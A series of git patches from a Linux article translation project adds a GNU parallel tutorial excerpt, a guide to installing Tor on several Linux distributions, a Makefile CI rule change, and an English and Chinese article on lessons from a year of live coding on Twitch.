[pigz][6]. + +First, I created ~1GB of random data in 100 files: +``` +for i in {1..100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done + +``` + +Then I compressed them using another `find -exec` command: +``` +find . -type f -name "file*" -exec gzip {} ';' + +``` + +This took `0m28.028s` to complete and again only used a single core. + +Converting the same command to use `parallel` gives us: +``` +find . -type f -name "file*" | parallel gzip {} + +``` + +This reduces the runtime to `0m5.774s`. + +Parallel is an easy to use tool that you should add to your sysadmins tool bag as it is going to save you a great deal of time in the right situation. + +-------------------------------------------------------------------------------- + +via: https://bash-prompt.net/guides/parallell-bash/ + +作者:[Elliot Cooper][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bash-prompt.net/about +[1]:https://www.gnu.org/software/parallel/ +[2]:https://github.com/mozilla/mozjpeg +[3]:https://www.mozilla.org/ +[4]:https://bash-prompt.net/images/guides/parallell-bash/top-single-core-100.png +[5]:https://bash-prompt.net/images/guides/parallell-bash/top-all-cores-100.png +[6]:https://zlib.net/pigz/ From 6b44403d08abb2f3bd98c7b59f508d6ed8212bbe Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 20 Dec 2017 22:56:30 +0800 Subject: [PATCH 0732/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Surf=20anonymou?= =?UTF-8?q?sly:=20Learn=20to=20install=20TOR=20network=20on=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...- Learn to install TOR network on Linux.md | 102 ++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md diff --git a/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md b/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md new file mode 100644 index 0000000000..f31c2d2202 --- /dev/null +++ b/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md @@ -0,0 +1,102 @@ +Surf anonymously: Learn to install TOR network on Linux +====== +Tor Network is an anonymous network to secure your internet & privacy. Tor network is a group of volunteer operated servers. Tor protects internet communication by bouncing it around a distributed network of relay system run by volunteers. This prevents us from people snooping the internet, they can't learn what site we visit or where is the user physically & it also allows us to use blocked websites. + +In this tutorial, we will learn to install Tor network on various Linux operating systems & how we can use it configure our applications to secure the communications. + + **(Recommended Read:[How to install Tor Browser on Linux (Ubuntu, Mint, RHEL, Fedora, CentOS)][1])** + +### CentOS/RHEL/Fedora + +Tor packages are part of EPEL repositories, so we can simply install Tor using yum if we have EPEL repositories installed. If you need to install EPEL repos on your system, use the suitable command (based on OS & Architecture) from the following , + + **RHEL/CentOS 7** + + **$ sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-11.noarch.rpm** + + **RHEL/CentOS 6 (64 Bit)** + + **$ sudo rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm** + + **RHEL/CentOS 6 (32 Bit)** + + **$ sudo rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm** + +Once installed, we can than install Tor browser with the following command, + + **$ sudo yum install tor** + +### Ubuntu + +For installing Tor network on Ubuntu machines, we need to add Official Tor repositories. We need to add the repo information to '/etc/apt/sources.list' + + **$ sudo nano /etc/apt/sources.list** + +Now add the repo information mentioned below based on your OS, + + **Ubuntu 16.04** + + **deb http://deb.torproject.org/torproject.org xenial main** +**deb-src http://deb.torproject.org/torproject.org xenial main** + + **Ubuntu 14.04** + + **deb http://deb.torproject.org/torproject.org trusty main** +**deb-src http://deb.torproject.org/torproject.org trusty main** + +Next open the terminal & execute the following two commands to add the gpg keys used to sign the packages, + + **$ gpg -keyserver keys.gnupg.net -recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89** +**$ gpg -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -** + +Now run update & install the Tor network, + + **$ sudo apt-get update** +**$ sudo apt-get install tor deb.torproject.org-keyring** + +### Debian + +We can install Tor network on Debian without having to add any repositories. Just open the terminal & execute the following command as root, + + **$ apt install tor** + +### + +### Tor Configuration + +If your end game is only to secure the internet browsing & not anything else, than its better you use Tor Browser but if you need to secure your apps like Instant Messaging, IRC, Jabber etc than we need to configure those apps for secure communication. But Before we do that, let's check out some [**warning mentioned on Tor Website**][2] + +- No torrents over Tor +- Don't use any browser plugins with Tor +- Use only HTTPS version of the websites +- Don't open any document downloaded through Tor while online. +- Use Tor bridges when you can + +Now to configure any app to use Tor, for example jabber; firstly select the 'SOCKS proxy' rather than using the HTTP proxy & use port number 9050 or you can also use port 9150 (used by Tor browser). + +![install tor network][4] + +You can also configure Firefox browser to be used on Tor network. Open Firefox browser & goto 'Network Proxy ' settings in 'Preferences' under 'General' tab & make the proxy entry as follows, + +![install tor network][6] + +We can now access Firefox on Tor network with complete anonymity. + +This was our tutorial on how we can install Tor network & use ti to surf the internet anonymously. Do mention you queries & suggestions in the comment box below. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/learn-install-tor-network-linux/ + +作者:[Shusain][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/install-tor-browser-linux-ubuntu-centos/ +[2]:https://www.torproject.org/download/download.html.en#warning +[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-1-compressor.png?resize=333%2C240 +[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-2-compressor.png?resize=730%2C640 From 12fc529d9a1c45a68247b64d2871fe21b15b4e61 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 20 Dec 2017 23:03:39 +0800 Subject: [PATCH 0733/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=20CI=20=E8=A7=84?= =?UTF-8?q?=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Makefile | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Makefile b/Makefile index 0dd46292f7..80eaaef362 100644 --- a/Makefile +++ b/Makefile @@ -18,28 +18,28 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [ $(shell egrep '^A\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] - [ $(shell egrep -v '^A\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] + [ $(shell grep '^A\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] + [ $(shell grep -v '^A\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 0 ] echo 'Rule Matched: $(@)' rule-translation-requested: - [ $(shell egrep '^M\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-completed: - [ $(shell egrep '^D\s*sources/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell egrep '^A\s*translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' rule-translation-revised: - [ $(shell egrep '^M\s*translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^M\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ] echo 'Rule Matched: $(@)' rule-translation-published: - [ $(shell egrep '^D\s*translated/(news|talk|tech)/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] - [ $(shell egrep '^A\s*published/\d{8} [a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^D\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] + [ $(shell grep '^A\s*published/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ] [ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ] echo 'Rule Matched: $(@)' From 613b261c31fc83414c548a69af67da9b19899e13 Mon Sep 17 00:00:00 2001 From: Lonaparte_CHENG Date: Wed, 20 Dec 2017 19:29:47 +0100 Subject: [PATCH 0734/1627] Translated by lonaparte --- ... my first year of live coding on Twitch.md | 161 ++++++++++++++++++ 1 file changed, 161 insertions(+) create mode 100644 translated/tech/20170707 Lessons from my first year of live coding on Twitch.md diff --git a/translated/tech/20170707 Lessons from my first year of live coding on Twitch.md b/translated/tech/20170707 Lessons from my first year of live coding on Twitch.md new file mode 100644 index 0000000000..7a2f0aa98a --- /dev/null +++ b/translated/tech/20170707 Lessons from my first year of live coding on Twitch.md @@ -0,0 +1,161 @@ +我在 Twitch 平台直播编程的第一年 +============================================================ +去年 7 月我进行了第一次直播。不像大多数人那样在 Twitch 上进行游戏直播,我想直播的内容是我利用个人时间进行的开源工作。我对 NodeJS 硬件库有一定的研究(其中大部分是靠我自学的)。考虑到我已经在 Twitch 上有了一个直播间,为什么不再建一个更小更专业的直播间,比如使用 JavaScript 驱动硬件JavaScript powered hardware 来建立直播间 :) 我注册了 [我自己的频道][1] ,从那以后我就开始定期直播。 + +我当然不是第一个这么做的人。[Handmade Hero][2] 是我最早看到的几个在线直播编程的程序员之一。很快这种直播方式被 Vlambeer 发扬光大,他在 Twitch 的 [Nuclear Throne live][3] 直播间进行直播。我对 Vlambeer 尤其着迷。 + +我的朋友 [Nolan Lawson][4] 让我 _真正开始做_ 这件事,而不只是单纯地 _想要做_ 。我看了他 [在周末直播开源工作][5] ,做得棒极了。他解释了他当时做的每一件事。每一件事。回复 GitHub 上的 问题issues ,鉴别 bug ,在 分支branches 中调试程序,你知道的。这令我着迷,因为 Nolan 使他的开源库得到了广泛的使用。他的开源生活和我的完全不一样。 + +你甚至可以看到我在他视频下的评论: + +![](https://cdn-images-1.medium.com/max/1600/0*tm8xC8CJV9ZimCCI.png) + +我大约在一周或更久之后建好了自己的 Twitch 频道,并摸清了 OBS 的使用方法,随后开始了自己的直播。我当时用的是 [Avrgirl-Arduino][6] ,现在我依然经常用它直播。第一次直播十分粗糙。我前一天晚上排练得很晚,但直播时我依然很紧张。 + +那个星期六我极少的几个听众给了我很大的鼓舞,因此我坚持了下去。现在我有了超过一千个听众,他们中的一些人形成了一个可爱的小团体,他们会定期观看我的直播,我称呼他们为 “noopkat 家庭” 。 + +我们很开心。我想称呼这个即时编程部分为“多玩家在线组队编程”。我真的被他们每个人的热情和才能触动了。一次,一个团体成员指出我的 Arduino 开发板没有连接上软件,因为板子上的芯片丢了。这真是最有趣的时刻之一。 + +我经常暂停直播,检查我的收件箱,看看有没有人对我提过的,不再有时间完成的工作发起 拉取请求pull request 。感谢我 Twitch 社区对我的帮助和鼓励。 + +我很想聊聊 Twitch 直播给我带来的好处,但它的内容太多了,我应该会在我下一个博客里介绍。我在这里想要分享的,是我学习的关于如何自己实现直播编程的课程。最近几个开发者问我怎么开始自己的直播,因此我在这里想大家展示我给他们的建议! + +首先,我在这里贴出一个给过我很大帮助的教程 [“Streaming and Finding Success on Twitch”][7] 。它专注于 Twitch 与游戏直播,但也有很多和我们要做的东西相关的部分。我建议首先阅读这个教程,然后再考虑一些建立直播频道的细节(比如如何选择设备和软件)。 + +下面我列出我自己的配置。这些配置是从我多次的错误经验中总结出来的,其中要感谢我的直播同行的智慧与建议(对,你们知道就是你们!)。 + +### 软件 + +有很多免费的直播软件。我用的是 [Open Broadcaster Software (OBS)][8] 。它适用于大多数的平台。我觉得它十分直观且易于入门,但掌握其他的进阶功能则需要一段时间的学习。学好它你会获得很多好处!这是今天我直播时 OBS 的桌面截图(点击查看大图): + +![](https://cdn-images-1.medium.com/max/1600/0*s4wyeYuaiThV52q5.png) + +你直播时需要在不用的“场景”中进行切换。一个“场景”是多个“素材”通过堆叠和组合产生的集合。一个“素材”可以是照相机,麦克风,你的桌面,网页,动态文本,图片等等。 OBS 是一个很强大的软件。 + +最上方的桌面场景是我编程的环境,我直播的时候主要停留在这里。我使用 iTerm 和 vim ,同时打开一个可以切换的浏览器窗口来查阅文献或在 GitHub 上分类检索资料。 + +底部的黑色长方形是我的网络摄像头,人们可以通过这种个人化的连接方式来观看我工作。 + +我的场景中有一些“标签”,很多都与状态或者顶栏信息有关。顶栏只是添加了个性化信息,它在直播时是一个很好的连续性素材。这是我在 [GIMP][9] 里制作的图片,在你的场景里它会作为一个素材来加载。一些标签是从文本文件里添加的动态内容(例如最新粉丝)。另一个标签是一个 [custom one I made][10] ,它可以展示我直播的房间的动态温度与湿度。 + +我还在我的场景里设置了“闹钟”,当有人粉了我或者给了打赏,它会显示在最前方。我使用 [Stream Labs][11] 网络服务来实现它,将它作为一个浏览器网页素材引进我的场景。 Stream Labs 也会在顶栏里给出我最新粉丝的动态信息。 + +我直播的时候,也会使用一个备用场景: + +![](https://cdn-images-1.medium.com/max/1600/0*cbkVjKpyWaWZLSfS.png) + +当我输入密码和 API keys 的时候,我另外需要一个场景。它会在网络摄像头里展示我,但是将我的桌面用一个娱乐页面隐藏起来,这样我可以做一些私密的工作: + +![](https://cdn-images-1.medium.com/max/1600/0*gbhowQ37jr3ouKhL.png) + +正如你看到的,我直播的时候没有把窗口填的太满,但我让我的观众尽可能多地看到我的内容。 + +但现在有一个现实的秘密:我使用 OBS 来安排我屏幕的底部和右侧,同时视频保持了 Twitch 要求的长宽比。这让我有了空间在底部查看我的事件(订阅数等),同时在右侧观看和回复我的频道聊天室。 Twitch 允许新窗口“弹出”聊天室,这很有用。 + +这是我完整的桌面看起来的样子: + +![](https://cdn-images-1.medium.com/max/1600/0*sENLkp3Plh7ZTjJt.png) + +我几个月前开始做这个,还没有回顾过。我甚至不确定我的观众们有没有意识到我进行的这些精心的设置。我想他们可能会把“我可以看到每个东西”视作理所应当,而事实上我常常忙于敲代码,而看不到正在直播的东西! + +你可能想知道为什么我只用一个显示器。这是因为两个显示器在我直播的时候太难以管理了。我很快意识到这一点,并且恢复了单屏。 + +### 硬件 + +我从使用便宜的器材开始,当我意识到我会长期坚持直播之后,才将他们逐渐换成更好的。开始的时候尽量使用你现有的器材,即使是只用电脑内置的摄像头与麦克风。 + +现在我使用 Logitech Pro C920 网络摄像头,和一个固定有支架的 Blue Yeti 麦克风。花费是值得的。我直播的质量完全不同了。 + +我使用大屏显示器(27"),因为我之前说的,使用两个屏幕对我来说不方便。我常常错过聊天,因为我经常不检查我的第二屏幕。你可能觉得使用两个屏幕很方便,但对我来说,把所有东西放在一个屏幕上有利于我对所有事情保持注意力。 + +这基本上就是硬件部分的大部分内容了。我没有使用复杂的设置。 + +如果你感兴趣,我的桌面看起来不错,除了刺眼的麦克风: + +![](https://cdn-images-1.medium.com/max/1600/0*EyRimlrHNEKeFmS4.jpg) + +### 建议 + +最后这里有一些我通过实践得出的一般性建议,这使我的直播从整体来看变得更好,更有趣。 + +#### 布告板 + +花点时间建立一个好的布告版。布告板是位于每个人频道底部的小内容框。我把它们看作新的个人空间窗口(真的)。理想的布告板可以有类似于聊天规则,有关直播内容的信息,你使用的电脑和设备,你最喜欢的猫的种类,等等这样的东西。任何关于个人形象的内容都可以。我们可以看看其他人(尤其是热播播主)的理想的布告板是什么样的! + +一个我的布告板的例子: + +![](https://cdn-images-1.medium.com/max/1600/0*HlLs6xlnJtPwN4D6.png) + +#### 聊天 + +聊天真的很重要。你可能会被中途观看你直播的人一遍又一遍地问同样的问题,如果可以像现实生活中那样聊天那样会很方便。“你正在做什么?”是我敲代码的时候别人最常问我的问题。我用 [Nightbot][12] 设置了一个聊天快捷命令。当你输入一些像 _whatamidoing_(我正在做什么) 这样的单词时,会自动给出我事先设好的解释。 + +当人们问问题或者给出一些有趣的评论时,要回复他们!和他们说谢谢,说他们的 Twitch 用的很好,他们会感谢你的关心和认可。一开始的时候很难对这些都保持注意力,但你做得多了之后,你会发现同时做这几件事变得更容易了。尝试着每两分钟就花几秒去关注聊天室。 + +当你编程的时候,_解释你正在做的事_ 。多说点。开开玩笑。即使我碰到了麻烦,我也会说:“哦,糟糕,我忘了这个方法怎么用了,我 Google 一下看看”。人们一般都很友好,有时他们还会和你一起寻找解决的办法。这很有趣,让人们一直看着你。 + +如果播主一直安静地坐在那敲代码,不去聊天,也不管他新粉丝的信息,我会很快对他失去兴趣。 + +很可能你 99% 的观众都很友好,并且都有好奇心。我偶尔还是会碰到挑衅的人,但 Twitch 提供的检查工具可以有效避免这种情况。 + +#### 准备时间 + +尽量将你的配置“自动化”。我的终端是 iTerm ,它可以让你保存窗口排列和字体大小的配置,这样你以后就可以再现这些配置。我有一个直播时的配置和一个不直播时的配置,这非常省事。我输入一个命令,所有东西就都在合适的位置并保持最完美的尺寸,并可以使用了。 + +还有其他的应用可以用来自动化你的窗口位置,看看有没有对你有用的。 + +让你的字体在终端和编辑器中尽可能的大,这样所有人都能看清。 + +#### 定期直播 + +让你的日程表更有规律。我一周只直播一次,但总是在同一时间。如果你临时有事不能在你平常直播的时间直播,要让人们知道。这让我保持了一些固定观众。一些人喜欢固定的时间,这就像和朋友在一起一样。你和你的社区在一个社交圈子里,所以要像对待朋友一样对待他们。 + +我想要提高我更新直播的频率,但我知道因为旅游的缘故我不能适应超过一周一次的直播频率。我正在尝试找到一种可以让我在路上也能高质量地直播的方法。或许可以临时将我聊天和写代码的过程保存起来,周末直播的时候再放出来。我仍然在探索这些办法! + +#### 紧张心理 + +当你即将开始的时候,你会感觉很奇怪,不适应。你会在人们看着你写代码的时候感到紧张。这很正常!尽管我之前有过公共演说的经历,我一开始的时候还是感到陌生而不适应。我感觉我无处可藏,这令我害怕。我想:“大家可能都觉得我的代码很糟糕,我是一个糟糕的开发者。”这是一个困扰了我 _整个职业生涯_ 的想法,对我来说不新鲜了。我知道带着这些想法,我不能在发布到 GitHub 之前仔细地再检查一遍代码,而这样做更有利于我保持我作为开发者的声誉。 + +我从 Twitch 直播中发现了很多关于我代码风格的东西。我知道我的风格绝对是“先让它跑起来,然后再考虑可读性,然后再考虑运行速度”。我不再在前一天晚上提前排练好直播的内容(一开始的三四次直播我都是这么做的),所以我在 Twitch 上写的代码是相当粗糙的,我还得保证它们运行起来没问题。当我不看别人的聊天和讨论的时候,我可以写出我最好的代码,这样是没问题的。但我总会忘记我使用过无数遍的方法的名字,而且每次直播的时候都会犯“愚蠢的”错误。一般来说,这不是一个让你能达到你最好状态的生产环境。 + +我的 Twitch 社区从来不会因为这个苛求我,反而是他们帮了我很多。他们理解我正同时做着几件事,而且真的给了很多务实的意见和建议。有时是他们帮我找到了解决方法,有时是我要向他们解释为什么他们的建议不适合解决这个问题。这真的很像一般意义的组队编程! + +我想这种“不管重要不重要,什么都说”的情况对于直播这种媒介来说是一种优势,而不是劣势。它让我想的更多。理解一个观念很重要,那就是没有完美的程序员,也没有完美的代码。对于一个新手程序员来说这是令人耳目一新的经历,对我这个老手来说却是微不足道的。 + +### 总结 + +如果你想过在 Twitch 上直播,我希望你试一下!如果你想知道怎么迈出第一步,我希望这篇博客可以帮的到你。 + +如果你周日想要加入我的直播,你可以 [订阅我的 Twitch 频道][13] :) + +最后我想说一下,我个人十分感谢 [Mattias Johansson][14] 在我早期开始直播的时候给我的建议和鼓励。他的 [FunFunFunction YouTube channel][15] 也是一个令人激动的定期直播频道。 + +另:许多人问过我的键盘和其他工作设备是什么样的, [这是我使用的器材的完整列表][16] 。感谢关注! + +-------------------------------------------------------------------------------- + +via: https://medium.freecodecamp.org/lessons-from-my-first-year-of-live-coding-on-twitch-41a32e2f41c1 + +作者:[ Suz Hinton][a] +译者:[lonaparte](https://github.com/lonaparte) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://medium.freecodecamp.org/@suzhinton +[1]:https://www.twitch.tv/noopkat +[2]:https://www.twitch.tv/handmade_hero +[3]:http://nuclearthrone.com/twitch/ +[4]:https://twitter.com/nolanlawson +[5]:https://www.youtube.com/watch?v=9FBvpKllTQQ +[6]:https://github.com/noopkat/avrgirl-arduino +[7]:https://www.reddit.com/r/Twitch/comments/4eyva6/a_guide_to_streaming_and_finding_success_on_twitch/ +[8]:https://obsproject.com/ +[9]:https://www.gimp.org/ +[10]:https://github.com/noopkat/study-temp +[11]:https://streamlabs.com/ +[12]:https://beta.nightbot.tv/ +[13]:https://www.twitch.tv/noopkat +[14]:https://twitter.com/mpjme +[15]:https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q +[16]:https://gist.github.com/noopkat/5de56cb2c5917175c5af3831a274a2c8 From 74c3ec2ccad4a89d1b2e997d4f241a3503a36249 Mon Sep 17 00:00:00 2001 From: Lonaparte_CHENG Date: Wed, 20 Dec 2017 19:31:54 +0100 Subject: [PATCH 0735/1627] Translated by lonaparte --- ... my first year of live coding on Twitch.md | 165 ------------------ 1 file changed, 165 deletions(-) delete mode 100644 sources/tech/20170707 Lessons from my first year of live coding on Twitch.md diff --git a/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md b/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md deleted file mode 100644 index 94a58e875e..0000000000 --- a/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md +++ /dev/null @@ -1,165 +0,0 @@ -Translating by lonaparte - -Lessons from my first year of live coding on Twitch -============================================================ - -I gave streaming a go for the first time last July. Instead of gaming, which the majority of streamers on Twitch do, I wanted to stream the open source work I do in my personal time. I work on NodeJS hardware libraries a fair bit (most of them my own). Given that I was already in a niche on Twitch, why not be in an even smaller niche, like JavaScript powered hardware ;) I signed up for [my own channel][1], and have been streaming regularly since. - -Of course I’m not the first to do this. [Handmade Hero][2] was one of the first programmers I watched code online, quickly followed by the developers at Vlambeer who [developed Nuclear Throne live on Twitch][3]. I was fascinated by Vlambeer especially. - -What tipped me over the edge of  _wishing_  I could do it to  _actually doing it_  is credited to [Nolan Lawson][4], a friend of mine. I watched him [streaming his open source work one weekend][5], and it was awesome. He explained everything he was doing along the way. Everything. Replying to issues on GitHub, triaging bugs, debugging code in branches, you name it. I found it fascinating, as Nolan maintains open source libraries that get a lot of use and activity. His open source life is very different to mine. - -You can even see this comment I left under his video: - -![](https://cdn-images-1.medium.com/max/1600/0*tm8xC8CJV9ZimCCI.png) - -I gave it a go myself a week or so later, after setting up my Twitch channel and bumbling my way through using OBS. I believe I worked on [Avrgirl-Arduino][6], which I still frequently work on while streaming. It was a rough first stream. I was very nervous, and I had stayed up late rehearsing everything I was going to do the night before. - -The tiny number of viewers I got that Saturday were really encouraging though, so I kept at it. These days I have more than a thousand followers, and a lovely subset of them are regular visitors who I call “the noopkat fam”. - -We have a lot of fun, and I like to call the live coding parts “massively multiplayer online pair programming”. I am truly touched by the kindness and wit of everyone joining me each weekend. One of the funniest moments I have had was when one of the fam pointed out that my Arduino board was not working with my software because the microchip was missing from the board: - - -I have logged off a stream many a time, only to find in my inbox that someone has sent a pull request for some work that I had mentioned I didn’t have the time to start on. I can honestly say that my open source work has been changed for the better, thanks to the generosity and encouragement of my Twitch community. - -I have so much more to say about the benefits that streaming on Twitch has brought me, but that’s for another blog post probably. Instead, I want to share the lessons I have learned for anyone else who would like to try live coding in this way for themselves. Recently I’ve been asked by a few developers how they can get started, so I’m publishing the same advice I have given them! - -Firstly, I’m linking you to a guide called [“Streaming and Finding Success on Twitch”][7] which helped me a lot. It’s focused towards Twitch and gaming streams specifically, but there are still relevant sections and great advice in there. I’d recommend reading this first before considering any other details about starting your channel (like equipment or software choices). - -My own advice is below, which I have acquired from my own mistakes and the sage wisdom of fellow streamers (you know who you are!). - -### Software - -There’s a lot of free streaming software out there to stream with. I use [Open Broadcaster Software (OBS)][8]. It’s available on most platforms. I found it really intuitive to get up and going, but others sometimes take a while to learn how it works. Your mileage may vary! Here is a screen-grab of what my OBS ‘desktop scene’ setup looks like as of today (click for larger image): - -![](https://cdn-images-1.medium.com/max/1600/0*s4wyeYuaiThV52q5.png) - -You essentially switch between ‘scenes’ while streaming. A scene is a collection of ‘sources’, layered and composited with each other. A source can be things like a camera, microphone, your desktop, a webpage, live text, images, the list goes on. OBS is very powerful. - -This desktop scene above is where I do all of my live coding, and I mostly live here for the duration of the stream. I use iTerm and vim, and also have a browser window handy to switch to in order to look up documentation and triage things on GitHub, etc. - -The bottom black rectangle is my webcam, so folks can see me work and have a more personal connection.  - -I have a handful of ‘labels’ for my scenes, many of which are to do with the stats and info in the top banner. The banner just adds personality, and is a nice persistent source of info while streaming. It’s an image I made in [GIMP][9], and you import it as a source in your scene. Some labels are live stats that pull from text files (such as most recent follower). Another label is a [custom one I made][10] which shows the live temperature and humidity of the room I stream from. - -I have also ‘alerts’ set up in my scenes, which show cute banners over the top of my stream whenever someone follows or donates money. I use the web service [Stream Labs][11] to do this, importing it as a browser webpage source into the scene. Stream Labs also creates my recent followers live text file to show in my banner. - -I also have a standby screen that I use when I’m about to be live: - -![](https://cdn-images-1.medium.com/max/1600/0*cbkVjKpyWaWZLSfS.png) - -I additionally need a scene for when I’m entering secret tokens or API keys. It shows me on the webcam but hides my desktop with an entertaining webpage, so I can work in privacy: - -![](https://cdn-images-1.medium.com/max/1600/0*gbhowQ37jr3ouKhL.png) - -As you can see, I don’t take stuff too seriously when streaming, but I like to have a good setup for my viewers to get the most out of my stream. - -But now for an actual secret: I use OBS to crop out the bottom and right edges of my screen, while keeping the same video size ratio as what Twitch expects. That leaves me with space to watch my events (follows, etc) on the bottom, and look at and respond to my channel chat box on the right. Twitch allows you to ‘pop out’ the chatbox in a new window which is really helpful. - -This is what my full desktop  _really _ looks like: - -![](https://cdn-images-1.medium.com/max/1600/0*sENLkp3Plh7ZTjJt.png) - -I started doing this a few months ago and haven’t looked back. I’m not even sure my viewers realise this is how my setup works. I think they take for granted that I can see everything, even though I cannot see what is actually being streamed live when I’m busy programming! - -You might be wondering why I only use one monitor. It’s because two monitors was just too much to manage on top of everything else I was doing while streaming. I figured this out quickly and have stuck with one screen since. - -### Hardware - -I used cheaper stuff to start out, and slowly bought nicer stuff as I realised that streaming was going to be something I stuck with. Use whatever you have when getting started, even if it’s your laptop’s built in microphone and camera. - -Nowadays I use a Logitech Pro C920 webcam, and a Blue Yeti microphone on a microphone arm with a mic shock. Totally worth the money in the end if you have it to spend. It made a difference to the quality of my streams. - -I use a large monitor (27"), because as I mentioned earlier using two monitors just didn’t work for me. I was missing things in the chat because I was not looking over to the second laptop screen enough, etc etc. Your milage may vary here, but having everything on one screen was key for me to pay attention to everything happening. - -That’s pretty much it on the hardware side; I don’t have a very complicated setup. - -If you were interested, my desk looks pretty normal except for the obnoxious looming microphone: - -![](https://cdn-images-1.medium.com/max/1600/0*EyRimlrHNEKeFmS4.jpg) - -### Tips - -This last section has some general tips I’ve picked up, that have made my stream better and more enjoyable overall. - -#### Panels - -Spend some time on creating great panels. Panels are the little content boxes on the bottom of everyone’s channel page. I see them as the new MySpace profile boxes (lol but really). Panel ideas could be things like chat rules, information about when you stream, what computer and equipment you use, your favourite cat breed; anything that creates a personal touch. Look at other channels (especially popular ones) for ideas! - -An example of one of my panels: - -![](https://cdn-images-1.medium.com/max/1600/0*HlLs6xlnJtPwN4D6.png) - -#### Chat - -Chat is really important. You’re going to get the same questions over and over as people join your stream halfway through, so having chat ‘macros’ can really help. “What are you working on?” is the most common question asked while I’m coding. I have chat shortcut ‘commands’ for that, which I made with [Nightbot][12]. It will put an explanation of something I have entered in ahead of time, by typing a small one word command like  _!whatamidoing_ - -When folks ask questions or leave nice comments, talk back to them! Say thanks, say their Twitch handle, and they’ll really appreciate the attention and acknowledgement. This is SUPER hard to stay on top of when you first start streaming, but multitasking will come easier as you do more. Try to take a few seconds every couple of minutes to look at the chat for new messages. - -When programming,  _explain what you’re doing_ . Talk a lot. Make jokes. Even when I’m stuck, I’ll say, “oh, crap, I forget how to use this method lemme Google it hahaha” and folks are always nice and sometimes they’ll even read along with you and help you out. It’s fun and engaging, and keeps folks watching. - -I lose interest quickly when I’m watching programming streams where the streamer is sitting in silence typing code, ignoring the chat and their new follower alerts. 